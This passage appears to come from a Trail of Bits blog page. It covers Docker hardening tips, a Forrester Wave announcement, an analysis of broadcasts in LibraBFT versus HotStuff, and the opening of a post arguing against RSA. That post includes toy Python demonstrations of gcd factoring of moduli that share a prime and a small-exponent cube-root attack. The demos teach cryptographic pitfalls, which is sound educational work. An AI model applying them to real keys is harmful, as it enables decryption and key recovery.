  • Use official Docker images or build your own based on them. Don’t inherit or use backdoored images.
  • Regularly rebuild your images to apply security patches. This goes without saying.
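
Several of these recommendations can be combined directly on the docker run command line. Here is a sketch of a hardened invocation; the image, resource limits, and user ID are placeholders to adapt to your workload:

```shell
# Illustrative hardened invocation; limits, user, and image are placeholders.
# Drops all capabilities, forbids privilege escalation via suid binaries,
# caps memory and process count, and runs as a non-root user.
docker run --rm -it \
  --cap-drop=all \
  --security-opt no-new-privileges \
  --memory=256m \
  --pids-limit=100 \
  --user 1000:1000 \
  ubuntu bash
```

Add back individual capabilities with --cap-add only where a workload demonstrably needs them.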

If you would like a second look at your organization’s critical infrastructure, Trail of Bits would love to help. Reach out and say hello!

Trail of Bits Named in Forrester Wave as a Leader in Midsize Cybersecurity Consulting Services

Trail of Bits was among the select companies that Forrester invited to participate in its recent report, The Forrester Wave™: Midsize Cybersecurity Consulting Services, Q2 2019. In this evaluation, Trail of Bits was cited as a Leader. We received the highest score among all participants in the current offering category, among the highest scores in the strategy category, and the highest scores possible in sixteen of the evaluation’s criteria.

You can download the full report here!

What is the Forrester Wave™?

Forrester is a leading global research and advisory firm that offers a variety of market reports, research, analysis, and consulting services. The Forrester Wave is a specific Forrester evaluation that provides “a guide for buyers considering their purchasing options in a technology marketplace.”

When Forrester reached out to us to participate in their study, we jumped at the chance. We respect their publication a lot. In our view, the Wave is:

  • A trusted source of truth – Forrester reports are the gold standard for citations on market data.
  • Not a paid publication – If Forrester finds a weakness in a participant’s company, they won’t gloss over it.
  • Built on thoughtful criteria – It’s hard to fully comprehend what’s important in cybersecurity consulting, especially for someone relatively new to our niche industry. Assessing efficacy is tough even if you know what you’re looking for. Forrester overcomes this by getting feedback on its questions and ranking criteria from participants.

What happened?

Forrester reached out to us and our competitors for an introductory call on how to prepare as participants. We were given the option to opt-out of participating but told we would be included in the report, regardless. Participants then provided feedback on criteria that Forrester Wave would use to assess our competencies. Once the criteria were finalized, Forrester gathered data from us and from some of our clients on how we performed against those criteria. When their report was complete, they let all participants fact-check the report. Needless to say, we were pleased to see that we’d received the highest score in the Current Offering category, and among the highest scores in the Strategy category.

The results

In addition to our ranking, Forrester made this analysis of our strengths and weaknesses:

Trail of Bits’ innovation efforts set its technical services apart. Its unique services include binary analysis, blockchain security, cryptography, and software development — many of which rely on tools that Trail of Bits developed in-house. Trail of Bits is also actively involved in building the cybersecurity community, especially emerging talent. It hosts a variety of office hours and local meetups and develops free educational resources for all levels of cybersecurity professionals. Reference customers highlighted Trail of Bits’ thought leadership, deep expertise in fields like blockchain security and cryptography, and thoroughness as strengths. However, those high standards come with some drawbacks as customers also noted limited resources and price as concerns. Trail of Bits’ deliverables are quite technical, and clients needed to do some extra translation of those deliverables for nonsecurity[sic] executives. For clients seeking a high level of technical cybersecurity proficiency from its services firm, Trail of Bits is a top-tier choice.

Our reflections

We’re celebrating the good

Trail of Bits’ innovation efforts set its technical services apart.

Our Take: Indeed! Our investments in R&D, our focus on using cutting-edge open source tooling, and our preference for tackling tough problems help us hone our advanced techniques and innovative approach.

Trail of Bits is also actively involved in building the cybersecurity community, especially emerging talent.

Our Take: We’re happy for this work to shine through! We’re passionate about empowering emerging talent with the information and skills necessary to break into our industry and push science forward with us. Releasing our proprietary tools as open source, sharing knowledge through online resources and our Empire Hacking meetup, and sponsoring emerging research are all core to our mission.

Reference customers highlighted Trail of Bits’ thought leadership, deep expertise in fields like blockchain security and cryptography, and thoroughness as strengths.

Our Take: We are intentional about focusing deeply on our niche skillset because it prepares us for solving our clients’ most challenging problems. We produce and use publicly available tools in our assessments, resulting in repeatable, verifiable results that other firms can’t offer.

We’re finding more ways to improve

Even as a Leader, this report shows us some opportunities for improvement. Growing at a pace that meets increasing market demand for our services is a challenge; we prefer to hire well rather than hire quickly. We know that the price point of our niche services puts our paid expertise out of reach for some smaller and under-resourced companies. We will address that by continuing to offer our knowledge on our blog, our open-source tools on GitHub, and our community resources like Empire Hacking and the NYC-Infosec directory. Finally, we are committed to translating summaries of our highly technical work for clients’ non-security executives. You can check out how we’re doing that in our public reports and presentations.

Overall, we’re honored to be included in this year’s report, encouraged by its findings, and excited to share the results.

Could you use a Forrester Wave Leader’s advice on a cybersecurity problem you’re facing? Contact us

On LibraBFT’s use of broadcasts

LibraBFT is the Byzantine Fault Tolerant (BFT) consensus algorithm used by the recently released Libra cryptocurrency. LibraBFT is based on another BFT consensus algorithm called HotStuff. While some have noted the similarities between the two algorithms, they differ in some crucial respects. In this post we highlight one such difference: in LibraBFT, non-leaders perform broadcasts. This has implications for liveness analysis, communication complexity, and leader election. We delve into each of these topics following a brief review of what BFT consensus algorithms are and why they are useful.

A brief history of BFT consensus algorithms

The term Byzantine Fault Tolerant (BFT) originates from a paper by Lamport, Shostak, and Pease. In that paper, the authors consider a fictional scenario in which a group of Byzantine generals are considering whether to attack a city. The problem is that some of the generals are traitors. The question is, if the traitors spread misinformation, then under what conditions can the group agree to attack or retreat from the city? Note that neither attacking nor retreating is considered more favorable than the other: the problem is simply to agree on one action!

This scenario is a metaphor for one that commonly arises in distributed systems: the generals are nodes in a network, the traitors are faulty nodes, and attacking the city is, say, committing a transaction to a database.

The Lamport et al. paper proposes a solution to this problem. However, the solution implicitly assumes a synchronous network, which means that messages between nodes are delivered within a fixed, known time bound. Compare this to an asynchronous network, where messages can be arbitrarily delayed and even reordered.

Dwork, Lynch, and Stockmeyer were the first to propose deterministic algorithms that solve the Byzantine generals problem for “partially synchronous” networks. (Earlier, Rabin and Ben-Or had proposed randomized algorithms.) Dwork et al.’s analysis of what it means for a network to be “partially synchronous” was a significant contribution to the study of BFT algorithms. However, the purpose of Dwork et al.’s algorithms appears to have been to establish the existence of such solutions. Thus, their algorithms are of more theoretical than practical interest.

Toward the end of the century, Castro and Liskov proposed a solution on which many contemporary algorithms have been based (e.g., Tendermint, described below). Castro and Liskov’s algorithm, called Practical Byzantine Fault Tolerance (PBFT), works as follows. Each round has a designated leader chosen from among the nodes, and each round is composed of three phases. Roughly, in the first phase, the leader proposes a command for all nodes to execute; in the second phase, the nodes vote on the command; and in the third phase, the nodes acknowledge receipt of each other’s votes and execute the command. When a node believes that a round has gone on for too long, it sends a timeout message to all other nodes; the nodes must then agree that the round should time out, which is a somewhat complicated process. PBFT, as a whole, works as long as at most ⌊(n-1)/3⌋ of the n nodes are faulty, which is the best that one can do.

In order to circumvent a classic impossibility result of Fischer, Lynch, and Paterson, PBFT prioritizes safety over liveness. This means that, say, a leader could propose a command and that command could fail to be executed, e.g., because of network problems. However, the algorithm is safe in the sense that if two non-faulty nodes execute some sequence of commands, then one is necessarily a prefix of the other.

It is interesting to note how PBFT uses broadcasts. During the first phase of each round, the leader broadcasts to all nodes. But, during the second and third phases, all nodes (not just the leader) broadcast to one another.

Figure 1 from the PBFT paper, which calls the three phases of each round “pre-prepare,” “prepare,” and “commit.” The numbers represent network nodes and the arrows represent messages. Note how non-leader nodes 1 and 2 broadcast to all other nodes during the second and third phases.

Many variants of PBFT have been proposed. One notable example is Tendermint. Like PBFT, Tendermint proceeds in rounds, each round is divided into three phases, and the use of broadcasts in each phase is similar. However, whereas timeouts in PBFT occur with respect to entire rounds, timeouts in Tendermint occur with respect to individual phases, which many regard as a simpler strategy. (See here for additional discussion.) Also, Tendermint has a well-tested implementation that is actively developed. For this reason, if none other, Tendermint has seen widespread use.

HotStuff may also be regarded as a variant of PBFT. The HotStuff algorithm is “pipelined” so that timing out in a round is essentially no different than timing out in a phase. But perhaps HotStuff’s most notable improvement over PBFT is its reduced “authenticator complexity.” As defined in the HotStuff paper, “an authenticator is either a partial signature or a signature” (page 4). The paper argues that “Authenticator complexity is a useful measure of communication complexity… it hides unnecessary details about the transmission topology… n messages carrying one authenticator count the same as one message carrying n authenticators.”

HotStuff achieves reduced authenticator complexity, in part, by using threshold signatures. This allows non-leaders to send their messages to only the leader and not to one another. For example, when voting on a command, nodes in HotStuff send their “share” of a signature to the leader. Once the leader has accumulated 2⌊(n-1)/3⌋ + 1 such shares, it broadcasts the combined signature to all other nodes. The other phases of the HotStuff algorithm are similar. In this way, HotStuff achieves linear authenticator complexity.
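
The fault and quorum thresholds above are simple functions of n. As a quick sketch (the function names are ours, not from the HotStuff paper):

```python
def max_faulty(n: int) -> int:
    """PBFT-style bound: tolerate at most floor((n-1)/3) faulty nodes."""
    return (n - 1) // 3

def quorum(n: int) -> int:
    """Signature shares a HotStuff leader must collect: 2*floor((n-1)/3) + 1."""
    return 2 * max_faulty(n) + 1

assert max_faulty(4) == 1 and quorum(4) == 3
assert max_faulty(100) == 33 and quorum(100) == 67
```

Note that a quorum of 2⌊(n-1)/3⌋ + 1 guarantees that any two quorums intersect in at least one non-faulty node.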


LibraBFT is the consensus algorithm used by the Libra cryptocurrency. LibraBFT is based on HotStuff. According to the Libra authors, there were “three reasons for selecting the HotStuff protocol as the basis for LibraBFT: (1) simplicity and modularity of the safety argument; (2) ability to easily integrate consensus with execution; and (3) promising performance in early experiments.”

LibraBFT and HotStuff are very similar. For example, LibraBFT retains HotStuff’s pipelined design. Furthermore, when voting on a command (or “block” to use LibraBFT’s terminology), nodes send their votes to only the leader and not to all other nodes.

Figure 3 from the LibraBFT paper. The letters B, V, and C are mnemonic for “block,” “vote,” and “[quorum] certificate,” respectively. Note how nodes send their votes to only the leader (like in HotStuff) and do not broadcast them to all other nodes (like in PBFT). On the other hand, note the caption, which indicates that “round synchronization” is not reflected in the figure. Round synchronization does involve broadcasts.

However, to achieve certain goals (explained below), LibraBFT uses broadcasts in ways that HotStuff does not. (In this way, LibraBFT resembles its distant ancestor, PBFT.) Specifically, LibraBFT requires non-leader nodes to perform broadcasts under the following circumstances:

  1. Nodes regularly synchronize their states using broadcasts.
  2. When a timeout is reached, e.g., because of network problems or a faulty leader, nodes send a timeout message to all other nodes.

The use of broadcasts for state synchronization makes it easier to establish a liveness result for LibraBFT. The reason for broadcasting timeouts is not given in the LibraBFT paper. However, as we explain below, we suspect it is to allow for the future use of an adaptive leader election mechanism. Despite these advantages, the additional broadcasts have the unfortunate side-effect of increasing the algorithm’s communication complexity. However, such an increase in communication complexity may be unavoidable. (Neither the state synchronization broadcasts nor the timeout broadcasts should affect the algorithm’s safety.)

Note: A recent blog post entitled “Libra: The Path Forward” makes clear that LibraBFT is a work-in-progress. Perhaps for this reason, there are discrepancies between LibraBFT as defined in the LibraBFT paper and as implemented in the Libra source code. For the remainder of this blog post, we focus on the former. We point out a couple of the differences between the LibraBFT specification and the Libra source code below. (Also note that, while the LibraBFT paper does contain code, that code is not part of Libra itself, but of a simulator. The LibraBFT authors “intend to share the code for this simulator and provide experimental results in a subsequent version of the report” (page 4). That version of the report has not yet been released.)

Liveness analysis

In LibraBFT, “nodes broadcast their states at least once per period of time [the minimum broadcast interval] 𝐼 > 0” (page 22). No similar notion exists in HotStuff. Unsurprisingly, this makes it easier to establish a liveness result for LibraBFT. However, the liveness analyses of the two algorithms differ in other ways, as we now explain.

HotStuff’s liveness theorem asserts that, under certain technical conditions including that the round leader is non-faulty, there exists a time bound within which all non-faulty nodes execute a command and move on to the next round. The liveness theorem is parameterized by two functions: Leader and NextView. Leader is a function of the round number and determines the leader of that round. The arguments of NextView are not given specifically, but include at least the round number. NextView determines when round timeout “interrupts” are generated.

HotStuff’s liveness theorem

LibraBFT’s liveness theorem has a similar form. However, there are two significant differences. First, LibraBFT’s analogs of the Leader and NextView functions are not left as parameters, but are given explicitly. Second, the time bound within which a command is executed is not merely asserted to exist, but is also given explicitly.


LibraBFT’s liveness theorem

Of note is the fact that LibraBFT’s explicit time bound features 𝐼, the minimum broadcast interval, mentioned above. The appearance of 𝐼 demonstrates that LibraBFT’s liveness analysis differs fundamentally from that of HotStuff, and is not merely a byproduct of explicitly given Leader and NextView mechanisms.

We would also point out that this is a place where the LibraBFT specification and the Libra source code do not exactly match. In LibraBFT, nodes broadcast their states to one another using DataSyncNotification messages (defined in Appendix A.3 of the LibraBFT paper). Nothing analogous to a DataSyncNotification message seems to exist within the Libra source code. For example, if one looks at the start_event_processing function from Libra’s chained_bft module, one can see calls to functions that process proposals, votes, etc. However, there is no call that would seem to process something resembling a DataSyncNotification message.

fn start_event_processing(
    event_processor: ConcurrentEventProcessor,
    executor: TaskExecutor,
) {
    // ... spawns tasks that process proposals, votes, etc. ...
}
An excerpt of the “start_event_processing” function from Libra’s “chained_bft” module. Note that none of the calls seem to process something resembling a LibraBFT DataSyncNotification message.

The bottom line is that the LibraBFT liveness analysis does not directly apply to the Libra source code in its present form. However, as mentioned above, LibraBFT is a work-in-progress. So, the existence of some discrepancies between the LibraBFT specification and the Libra source code is not surprising.

Communication complexity

As mentioned above in the description of HotStuff, HotStuff achieves linear authenticator complexity, where “an authenticator is either a partial signature or a signature” sent in a network message in a single round. What is LibraBFT’s authenticator complexity? The answer, as we discuss next, is somewhat ambiguous.

The LibraBFT paper does not mention “authenticator complexity” specifically, though it does claim that “LibraBFT has two desirable properties that BFT consensus protocols preceding HotStuff were not able to simultaneously support — linearity and responsiveness. … Informally, linearity guarantees that driving transaction commits incurs only linear communication…” (page 2). The claim is not addressed later in the paper. As we argue below, LibraBFT’s authenticator complexity is at least O(n2), where n is the number of nodes. So, either the authors were not referring to authenticator complexity, or the claim is some sort of oversight.

When a LibraBFT node believes that a round has gone on for too long, it broadcasts a timeout message to all other nodes. These timeout messages are signed. Therefore, LibraBFT’s authenticator complexity is at least O(n2).
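
A back-of-the-envelope sketch of that bound (our own arithmetic, not from the paper):

```python
def timeout_authenticators(n: int) -> int:
    """Each of n nodes broadcasts one signed timeout message to the
    other n - 1 nodes, so a timed-out round carries n*(n-1) authenticators."""
    return n * (n - 1)

# Quadratic growth: doubling n roughly quadruples the count.
assert timeout_authenticators(10) == 90
assert timeout_authenticators(20) == 380
```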

How does LibraBFT’s use of broadcasts in state synchronization affect authenticator complexity?

State synchronization is parameterized by the minimum broadcast interval, 𝐼, mentioned above in the discussion of liveness analysis. The LibraBFT paper states that “nodes broadcast their states at least once per period of time 𝐼 > 0” (page 22). Taking this into account, the authenticator complexity of LibraBFT should be not just a function of n, but also of 𝐼.

However, the paper’s Appendix A.3 states “we have assumed that [data-synchronization messages] are transmitted over authenticated channels and omitted message signatures” (page 36). One could use this fact to argue that data synchronization does not affect authenticator complexity (though, that would feel a lot like cheating).

So, LibraBFT’s authenticator complexity is at least O(n2) due to its use of timeout broadcasts. It could be more, depending upon one’s assumptions about the network.

To be clear, this is a worst case analysis. In the common case, timeouts will not occur. Thus, if 𝐼 is large, say, many multiples of the typical round duration, then LibraBFT’s performance will be close to linear.

One final point is worth mentioning. HotStuff uses a predictable leader election strategy. As explained in the next section, the Libra authors are trying to avoid using such a strategy. To the best of our knowledge, no sub-quadratic adaptive leader election strategy currently exists. Thus, in comparing the communication complexity of HotStuff and LibraBFT, some increase may be unavoidable.

Leader election

At the time of this writing, the Libra source code’s leader election strategy is round-robin. However, the LibraBFT authors note that this strategy makes round leaders predictable, which facilitates denial-of-service attacks. In considering alternatives, the authors note that depending on hashes in a naive way could facilitate “grinding attacks,” e.g., where an attacker influences the hash in such a way as to increase the likelihood of a particular node being selected the leader.

To address the former problem and circumvent the latter, the authors state, “we intend to use a verifiable random function (VRF) in the future.” (In fact, a VRF is already implemented in the Libra source code, though it does not yet seem to be used.) In the next two paragraphs, we explain what VRFs are. Then, following a brief explanation of what it means for a LibraBFT block to be “committed,” we explain how LibraBFT’s proposed use of VRFs in leader elections is enabled by its use of broadcasts.

Intuitively, a VRF is a function that, given some input, produces two outputs: a random-looking value, and a proof that the value was derived from the input. The function is expected to have two properties. First, it should not be obvious how the random-looking value was derived from the input. Second, it should be possible to convince an observer that the random-looking value was derived from the input, even though that fact is not obvious. This latter property is made possible via the proof.

A simple example of a VRF is given in Section 4 of Goldberg, Reyzin, Papadopoulos, and Vcelak’s draft RFC. In that example, the random-looking value is an RSA signature computed over the hash of the input, and the proof is the hash. An observer can verify the proof by checking that the input has the hash, and that the signature corresponds to the hash. (Note: for production code, we recommend using the elliptic-curve-based VRF of Section 5 of the RFC, and not the RSA-based VRF of Section 4.)
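
To make the hash-then-sign construction concrete, here is a toy sketch using textbook RSA parameters. The tiny key, the reduction of the hash modulo n, and all names are our own simplifications for illustration; do not use anything like this in production:

```python
import hashlib

# Textbook RSA parameters (p=61, q=53); real VRFs use full-size keys.
N, E, D = 3233, 17, 2753

def vrf_prove(alpha: bytes):
    """Toy VRF: the 'proof' is the hash of the input, and the 'value'
    is an RSA signature over that hash (reduced mod N for the toy key)."""
    h = int.from_bytes(hashlib.sha256(alpha).digest(), "big") % N
    value = pow(h, D, N)  # sign with the private exponent
    return value, h

def vrf_verify(alpha: bytes, value: int, proof: int) -> bool:
    """Check that the input has the claimed hash and that the
    signature corresponds to that hash."""
    h = int.from_bytes(hashlib.sha256(alpha).digest(), "big") % N
    return proof == h and pow(value, E, N) == h

value, proof = vrf_prove(b"round 42")
assert vrf_verify(b"round 42", value, proof)
```

Only the key holder can produce the value, but anyone holding the public key (N, E) can verify it, which is exactly the property leader election needs.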

We now briefly explain what it means for a LibraBFT block to be “committed.” In LibraBFT, blocks and quorum certificates alternate to form a chain:

B0 ← C0 ← B1 ← C1 ← B2 ← C2 ← ⋯

These blocks (certificates) need not be proposed (assembled) in contiguous rounds; there could be arbitrarily large gaps between them. A block is said to be “committed” when: (1) it appears below two other blocks, (2) all three blocks have associated quorum certificates, and (3) the blocks were proposed in contiguous rounds.

The reason for this rule is a bit technical. But, intuitively, a “committed” block is considered permanent by all non-faulty nodes. In contrast, a block that appears below fewer than two certified blocks is considered impermanent, and may have to be abandoned in favor of another block.
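
The commit rule can be sketched as a predicate over the chain (a hypothetical helper of our own; Libra's actual code is structured differently):

```python
def committed_blocks(chain):
    """chain: list of (round, certified) pairs in chain order.
    A block is committed when it is followed in the chain by two more
    blocks, all three are certified, and all three were proposed in
    contiguous rounds."""
    out = []
    for i in range(len(chain) - 2):
        (r0, c0), (r1, c1), (r2, c2) = chain[i], chain[i + 1], chain[i + 2]
        if c0 and c1 and c2 and (r1, r2) == (r0 + 1, r0 + 2):
            out.append(r0)
    return out

# Rounds 3-5 are contiguous and certified, so the round-3 block commits;
# the gap after round 1 prevents the round-1 block from committing.
assert committed_blocks([(1, True), (3, True), (4, True), (5, True)]) == [3]
```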

The LibraBFT authors intend to use VRFs in leader elections as follows. Each node will have its own instance of some VRF (e.g., a VRF instantiated with a private key belonging to the node). The leader for round i will be determined using the VRF instance of the round leader for the most recently committed block. That VRF instance will determine a seed for a pseudo-random function (PRF). The resulting PRF instance will then determine the leader for round i and each subsequent round until a new block becomes committed. The reason for using two functions like this is (we believe) so that round leaders can be determined even if the proposer of the most recently committed block goes offline.
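
A sketch of this two-stage scheme, with HMAC-SHA256 standing in for the PRF and a fixed byte string standing in for a VRF output (all names and parameters here are our own assumptions, not LibraBFT's):

```python
import hashlib
import hmac

NUM_NODES = 4

def leader_for_round(seed: bytes, round_number: int) -> int:
    """PRF stand-in: HMAC-SHA256 keyed by the VRF-derived seed.
    The same seed keeps electing leaders until a new block commits."""
    digest = hmac.new(seed, round_number.to_bytes(8, "big"), hashlib.sha256).digest()
    return int.from_bytes(digest, "big") % NUM_NODES

# The seed changes only when a new block becomes committed, so rounds
# between commits are served by the same PRF instance.
seed = hashlib.sha256(b"vrf output of last committed block's proposer").digest()
leaders = [leader_for_round(seed, r) for r in range(5)]
assert all(0 <= l < NUM_NODES for l in leaders)
```

Because the seed is fixed between commits, any node that knows the last committed block can compute the same leader schedule, even if the block's proposer goes offline.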

We now explain how LibraBFT’s proposed use of VRFs in leader elections is enabled by its use of broadcasts. Or, more specifically, we explain why LibraBFT’s proposed use of VRFs would not work if a node could send a timeout message to just one other node, as is the case in HotStuff. The purpose of a timeout message is to tell the next round leader to start the next round. But, as we show in the next several paragraphs, who that next leader is can depend upon the cause of the timeout.

Suppose that in contiguous rounds i-2, i-1, and i, blocks Bm-2, Bm-1, and Bm are proposed. Further suppose that the leader for round i assembles a quorum certificate Cm and broadcasts it to all other nodes. Thus, at the start of round i+1, the most recently committed block is Bm-2:

B0 ← C0 ← ⋯ ← Bm-2 ← Cm-2 ← Bm-1 ← Cm-1 ← Bm ← Cm

But suppose that the leader for round i does not receive a block proposal for round i+1 within a reasonable timeframe. If the leader for round i could send a timeout message to just one other node, to whom should she send it? (Note that the leader for round i plays no special role in detecting or announcing the timeout of round i+1.)

Consider the following two explanations for why the leader for round i does not receive a block proposal for round i+1.

  • Case 1: The leader for round i+1 is faulty and never proposed a block. In this case, the most recently committed block at round i+2 is still B_{m-2}. Thus, the leader for round i+2 should be determined by the same PRF instance that determined the leader for round i+1. If the leader for round i could send a timeout message to just one other node, she should send it to the leader determined by this existing PRF instance.
  • Case 2: There is a network delay. The leader for round i+1 proposed a block and assembled a quorum certificate, but the leader for round i did not receive them in time. In this case, the most recently committed block at round i+2 is B_{m-1}. Thus, the leader for round i+2 should be determined by a new PRF instance, one seeded by the VRF instance belonging to the proposer of B_{m-1}. If the leader for round i could send a timeout message to just one other node, she should send it to the leader determined by this new PRF instance.

This ambiguity is resolved by having the leader for round i send its timeout message to all other nodes. We would not be surprised if the LibraBFT authors introduced timeout broadcasts to address this type of scenario specifically.

Finally, note that a similar problem does not exist in HotStuff. In HotStuff, the round leader is determined by “some deterministic mapping from view number to a replica, eventually rotating through all replicas,” and does not depend on the most recently committed block. On the other hand, the predictability of round leaders makes HotStuff susceptible to denial-of-service attacks, which the LibraBFT authors are trying to avoid.

LibraBFT and HotStuff are distinct algorithms

LibraBFT and HotStuff are very similar, but the two algorithms differ in some crucial respects. In LibraBFT, non-leaders perform broadcasts. The use of broadcasts in state synchronization makes it easier to establish a liveness result for LibraBFT. We suspect that timeout broadcasts were introduced to allow for the future use of an adaptive leader election mechanism, e.g., one based on VRFs. Despite these advantages, the additional broadcasts increase the algorithm’s communication complexity. However, this increase in communication complexity may be unavoidable.

We intend to keep a close eye on Libra. If you are developing a Libra application, please consider us for your security review.

Updated July 16, 2019.

Seriously, stop using RSA

Here at Trail of Bits we review a lot of code. From major open source projects to exciting new proprietary software, we’ve seen it all. But one common denominator in all of these systems is that for some inexplicable reason people still seem to think RSA is a good cryptosystem to use. Let me save you a bit of time and money and just say outright—if you come to us with a codebase that uses RSA, you will be paying for the hour of time required for us to explain why you should stop using it.

RSA is an intrinsically fragile cryptosystem containing countless foot-guns which the average software engineer cannot be expected to avoid. Weak parameters can be difficult, if not impossible, to check, and its poor performance compels developers to take risky shortcuts. Even worse, padding oracle attacks remain rampant 20 years after they were discovered. While it may be theoretically possible to implement RSA correctly, decades of devastating attacks have proven that such a feat may be unachievable in practice.

What is RSA again?

RSA is a public-key cryptosystem that has two primary use cases. The first is public key encryption, which lets a user, Alice, publish a public key that allows anyone to send her an encrypted message. The second use case is digital signatures, which allow Alice to “sign” a message so that anyone can verify the message hasn’t been tampered with. The convenient thing about RSA is that the signing algorithm is basically just the encryption algorithm run in reverse. Therefore for the rest of this post we’ll often refer to both as just RSA.

To set up RSA, Alice needs to choose two primes p and q that will generate the group of integers modulo N = pq. She then needs to choose a public exponent e and private exponent d such that ed ≡ 1 (mod (p-1)(q-1)). Basically, e and d need to be multiplicative inverses of each other modulo (p-1)(q-1).

Once these parameters have been chosen, another user, Bob, can send Alice a message M by computing C = M^e (mod N). Alice can then decrypt the ciphertext by computing M = C^d (mod N). Conversely, if Alice wants to sign a message M, she computes S = M^d (mod N), which any user can verify was signed by her by checking M = S^e (mod N).
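To make the arithmetic concrete, here is textbook RSA in Python with deliberately tiny, insecure parameters (toy primes, no padding):

```python
# Textbook RSA with toy parameters -- insecure by construction (tiny primes,
# no padding); shown only to make the modular arithmetic concrete.
p, q = 61, 53
N = p * q                      # 3233
phi = (p - 1) * (q - 1)        # 3120
e = 17                         # public exponent
d = pow(e, -1, phi)            # private exponent: e*d ≡ 1 (mod phi)

M = 65                         # message, encoded as an integer < N
C = pow(M, e, N)               # encryption: C = M^e mod N
assert pow(C, d, N) == M       # decryption recovers M

S = pow(M, d, N)               # signing: S = M^d mod N
assert pow(S, e, N) == M       # verification: M = S^e mod N
```

Note how signing really is decryption run on the message, which is why the two operations share a failure surface.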

That’s the basic idea. We’ll get to padding—essential for both use cases—in a bit, but first let’s see what can go wrong during parameter selection.

Setting yourself up for failure

RSA requires developers to choose quite a few parameters during setup. Unfortunately, seemingly innocent parameter-selection methods degrade security in subtle ways. Let’s walk through each parameter choice and see what nasty surprises await those who choose poorly.

Prime Selection

RSA’s security is based on the fact that, given a (large) number N that’s the product of two primes p and q, factoring N is hard for people who don’t know p and q. Developers are responsible for choosing the primes that make up the RSA modulus. This process is extremely slow compared to key generation for other cryptographic protocols, where simply choosing some random bytes is sufficient. Therefore, instead of generating a truly random prime number, developers often attempt to generate one of a specific form. This almost always ends badly.

There are many ways to choose primes in such a way that factoring N is easy. For example, p and q must be globally unique. If p or q is ever reused in another RSA modulus, then both moduli can be easily factored using the GCD algorithm. Bad random number generators make this scenario somewhat common, and research has shown that roughly 1% of TLS traffic in 2012 was susceptible to such an attack. Moreover, p and q must be chosen independently. If p and q share approximately half of their upper bits, then N can be factored using Fermat’s method. In fact, even the choice of primality testing algorithm can have security implications.
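The shared-prime failure is easy to demonstrate. In this sketch (toy numbers of our own choosing, far too small for real use), two moduli that accidentally reuse a prime are both factored by a single gcd call:

```python
from math import gcd

# If two RSA moduli accidentally share a prime (e.g., a bad RNG hands the
# same p to two keygens), one gcd computation factors both moduli.
p_shared, q1, q2 = 1000003, 1000033, 1000037   # toy primes for illustration
n1, n2 = p_shared * q1, p_shared * q2

p = gcd(n1, n2)                          # recovers the shared prime instantly
assert p == p_shared
assert n1 // p == q1 and n2 // p == q2   # both moduli fully factored
```

The 2012 study mentioned above ran essentially this computation pairwise across millions of harvested public keys.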

Perhaps the most widely-publicized prime selection attack is the ROCA vulnerability in RSALib which affected many smartcards, trusted platform modules, and even Yubikeys. Here, key generation only used primes of a specific form to speed up computation time. Primes generated this way are trivial to detect using clever number theory tricks. Once a weak system has been recognized, the special algebraic properties of the primes allow an attacker to use Coppersmith’s method to factor N. More concretely, that means if the person sitting next to me at work uses a smartcard granting them access to private documents, and they leave it on their desk during lunch, I can clone the smartcard and give myself access to all their sensitive files.

It’s important to recognize that in none of these cases is it intuitively obvious that generating primes in such a way leads to complete system failure. Really subtle number-theoretic properties of primes have a substantial effect on the security of RSA. To expect the average developer to navigate this mathematical minefield severely undermines RSA’s safety.

Private Exponent

Since using a large private key negatively affects decryption and signing time, developers have an incentive to choose a small private exponent d, especially in low-power settings like smartcards. However, it is possible for an attacker to recover the private key when d is less than the 4th root of N. Instead, developers are encouraged to choose a large d such that Chinese remainder theorem techniques can be used to speed up decryption. However, this approach’s complexity increases the probability of subtle implementation errors, which can lead to key recovery. In fact, one of our interns last summer modelled this class of vulnerabilities with our symbolic execution tool Manticore.
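For reference, the CRT shortcut mentioned above looks roughly like this (toy parameters; dP, dQ, and qInv are the standard precomputed values carried in PKCS #1 private keys):

```python
# Sketch of the standard CRT speedup for RSA decryption, with toy parameters.
# Working modulo p and q separately is much cheaper than one exponentiation
# mod N -- but each extra moving part (dP, dQ, qInv) is one more place for
# an implementation to go subtly wrong.
p, q = 61, 53
N = p * q
e = 17
d = pow(e, -1, (p - 1) * (q - 1))

# Precomputed CRT values, as stored in real RSA private keys (PKCS #1):
dP = d % (p - 1)
dQ = d % (q - 1)
qInv = pow(q, -1, p)

def decrypt_crt(C: int) -> int:
    m1 = pow(C, dP, p)             # half-size exponentiation mod p
    m2 = pow(C, dQ, q)             # half-size exponentiation mod q
    h = (qInv * (m1 - m2)) % p     # Garner's recombination
    return m2 + h * q

C = pow(42, e, N)
assert decrypt_crt(C) == 42
assert decrypt_crt(C) == pow(C, d, N)   # matches the straightforward method
```

Note that CRT decryption is also where fault attacks on RSA signatures live: corrupt one of the two half-exponentiations and the private key can leak.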

People might call me out here and point out that normally when setting up RSA you first generate a modulus, use a fixed public exponent, and then solve for the private exponent. This prevents low private exponent attacks because if you always use one of the recommended public exponents (discussed in the next section) then you’ll never wind up with a small private exponent. Unfortunately this assumes developers actually do that. In circumstances where people implement their own RSA, all bets are off in terms of using standard RSA setup procedures, and developers will frequently do strange things like choose the private exponent first and then solve for the public exponent.

Public Exponent

Just as in the private exponent case, implementers want to use small public exponents to save on encryption and verification time. It is common to use Fermat primes in this context, in particular e = 3, 17, and 65537. Despite cryptographers recommending the use of 65537, developers often choose e = 3 which introduces many vulnerabilities into the RSA cryptosystem.

Developers have even used e = 1, which doesn’t actually encrypt the plaintext

When e = 3, or a similarly small number, many things can go wrong. Low public exponents often combine with other common mistakes to either allow an attacker to decrypt specific ciphertexts or factor N. For instance, the Franklin-Reiter attack allows a malicious party to decrypt two messages that are related by a known, fixed distance. In other words, suppose Alice only sends “chocolate” or “vanilla” to Bob. These messages will be related by a known value and allow an attacker Eve to determine which are “chocolate” and which are “vanilla.” Some low public exponent attacks even lead to key recovery. If the public exponent is small (not just 3), an attacker who knows several bits of the secret key can recover the remaining bits and break the cryptosystem. While many of these e = 3 attacks on RSA encryption are mitigated by padding, developers who implement their own RSA fail to use padding at an alarmingly high rate.
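The simplest of these failures to demonstrate is the unpadded small-message case: if M^3 < N, the modular reduction never actually happens, so an attacker recovers M with an ordinary integer cube root and no factoring at all. A toy sketch (the primes below are illustrative choices of our own):

```python
# The simplest e = 3 failure mode: encrypting a short message with no
# padding. If M^3 < N, then "M^3 mod N" never wraps, and the plaintext
# falls out of an integer cube root.
p = 2**127 - 1                      # Mersenne primes, for illustration only
q = 2**89 - 1
N = p * q
e = 3

M = int.from_bytes(b"vanilla", "big")
C = pow(M, e, N)                    # M^3 < N, so C is literally M**3

def icbrt(n: int) -> int:
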